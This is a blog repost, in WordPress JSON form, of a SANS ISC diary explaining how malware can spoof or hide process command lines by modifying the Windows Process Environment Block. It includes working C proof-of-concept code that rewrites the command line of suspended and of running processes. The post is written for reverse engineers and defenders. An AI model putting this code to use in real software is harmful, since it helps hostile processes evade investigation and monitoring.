{"id":506,"date":"2026-01-09T09:04:44","date_gmt":"2026-01-09T09:04:44","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/"},"modified":"2026-01-09T09:04:44","modified_gmt":"2026-01-09T09:04:44","slug":"malicious-process-environment-block-manipulation-fri-jan-9th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/","title":{"rendered":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th)"},"content":{"rendered":"
\n

Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1<\/a>]. Today, I\u2019ll show you how a malware can hide suspicious information related to created processes.<\/p>\n

The API call CreateProcess() is dedicated to, guess what, the creation of new processes![2<\/a>]\u00a0I won\u2019t discuss all the parameters here but you have to know to it\u2019s possible to specify some flags that will describe how the process will be created. One of them is CREATE_SUSPENDED (0x00000004). It will instruct the OS to create the process but not launch it automatically. This flag is usually a good sign of maliciousness (example in case of process hollowing)<\/p>\n

Every process has a specific structure called the \u201cPEB\u201d (\u201cProcess Environment Block\u201d)[3<\/a>]. It\u2019s a user-mode data structure in Windows that the operating system maintains for each running process to store essential runtime information such as loaded modules, process parameters, heap pointers, environment variables, and debugging flags.<\/p>\n

The key element in the previous paragraph is user-mode<\/strong>. It means that a process is able to access its own PEB (example: to detect the presence of a debugger attached to the process) but also to modify it!<\/p>\n

Let\u2019s take a practical example where a malware needs to spawn a cmd.exe with some parameters. We can spoof the command line by modifying the PEB in a few steps:<\/p>\n

    \n
  1. Locate the PEB<\/li>\n
  2. Read the process parameters<\/li>\n
  3. Overwrite them<\/li>\n
  4. Resume the process<\/li>\n<\/ol>\n

    Here is a proof-of-concept:<\/p>\n

    \n#include <windows.h>\n#include <winternl.h>\n#include <stdio.h>\n#pragma comment(lib, \"ntdll.lib\")\n\nint main() {\n    STARTUPINFO si = { sizeof(si) };\n    PROCESS_INFORMATION pi;\n \n    \/\/ Start a process with some parameters\n    BOOL success = CreateProcessA(\n        \"C:\\Windows\\System32\\cmd.exe\",\n        (LPSTR)\"cmd.exe \/c echo I am malicious! }:->\",\n        NULL, NULL, FALSE,\n        CREATE_SUSPENDED,\n        NULL, NULL, &si, &pi\n    );\n\n    if (success) {\n        PROCESS_BASIC_INFORMATION pbi;\n        ULONG returnLength;\n\n        \/\/ Get the PEB address\n        NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);\n\n        \/\/ Read ProcessParameters\n        PEB peb;\n        ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);\n\n        RTL_USER_PROCESS_PARAMETERS params;\n        ReadProcessMemory(pi.hProcess, peb.ProcessParameters, &params, sizeof(RTL_USER_PROCESS_PARAMETERS), NULL);\n\n        \/\/ Overwrite the CommandLine buffer\n        WCHAR newCmd[] = L\"cmd.exe \/c echo Nothing to see here!\";\n        WriteProcessMemory(pi.hProcess, params.CommandLine.Buffer, newCmd, sizeof(newCmd), NULL);\n        printf(\"Press enter to continue and resume the process...n\");\n        getchar();\n\n        \/\/ Resume the process\n        ResumeThread(pi.hThread);\n        CloseHandle(pi.hProcess);\n        CloseHandle(pi.hThread);\n        printf(\"Process resumed with modified PEB.n\");\n    }\n    return 0;\n}<\/pre>\n
    Once you launch poc.exe, check the cmd.exe process:<\/p>\n
    \"\"<\/p>\n
    With this scenario, cmd.exe is executed with the new<\/strong> parameters. What about modifying a running process and hide (not spoof) its parameters?<\/p>\n
    To achieve this, the process does not have to be created in suspended state but it must be kept running! The idea is to get a handle on the process and modify its PEB:<\/p>\n
    \nvoid modifyRunningProcess(DWORD pid, const wchar_t* newCmd) {\n    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n    if (!hProcess) return;\n\n    PROCESS_BASIC_INFORMATION pbi;\n    ULONG retLen;\n    NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen);\n\n    PEB peb;\n    ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);\n\n    RTL_USER_PROCESS_PARAMETERS params;\n    ReadProcessMemory(hProcess, peb.ProcessParameters, &params, sizeof(params), NULL);\n\n    USHORT newSize = (USHORT)(wcslen(newCmd) * sizeof(WCHAR));\n    WriteProcessMemory(hProcess, params.CommandLine.Buffer, newCmd, newSize + 2, NULL);\n    WriteProcessMemory(hProcess, (PBYTE)peb.ProcessParameters + offsetof(RTL_USER_PROCESS_PARAMETERS, CommandLine.Length), \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b                       &newSize, sizeof(USHORT), NULL);\n\n    CloseHandle(hProcess);\n    printf(\"PEB Updated for PID: %dn\", pid);\n}<\/pre>\n
    By aware that this technique has an important limitation, you must replace the existing command line with a less (with trailing spaces) or equal length, otherwise there is a risk of buffer overflow! Finally, this technique will not prevent tools like EDRs to log the orignial parameters because they are logged at process creation. Hopefully!<\/p>\n
    [1] https:\/\/isc.sans.edu\/diary\/Abusing+DLLs+EntryPoint+for+the+Fun\/32562<\/a>
    \n[2]     https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/processthreadsapi\/nf-processthreadsapi-createprocessa<\/a>
    \n[3]     https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/winternl\/ns-winternl-peb<\/a><\/p>\n
    Xavier Mertens (@xme)
    \nXameco
    \nSenior ISC Handler – Freelance Cyber Security Consultant
    \n    PGP Key<\/a><\/p>\n
     (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"
    Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I\u2019ll show you how a malware can hide suspicious information related to created processes. The API call CreateProcess() is […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-506","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nMalicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Malicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I\u2019ll show you how a malware can hide suspicious information related to created processes. The API call CreateProcess() is […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-09T09:04:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Malicious Process Environment Block Manipulation, (Fri, Jan 9th)\",\"datePublished\":\"2026-01-09T09:04:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\"},\"wordCount\":454,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\",\"name\":\"Malicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png\",\"datePublished\":\"2026-01-09T09:04:44+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malicious Process Environment Block Manipulation, (Fri, Jan 9th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/","og_locale":"en_US","og_type":"article","og_title":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited","og_description":"Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I\u2019ll show you how a malware can hide suspicious information related to created processes. The API call CreateProcess() is […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-01-09T09:04:44+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th)","datePublished":"2026-01-09T09:04:44+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/"},"wordCount":454,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/","name":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png","datePublished":"2026-01-09T09:04:44+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260109-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/09\/malicious-process-environment-block-manipulation-fri-jan-9th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Malicious Process Environment Block Manipulation, (Fri, Jan 9th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=506"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/506\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}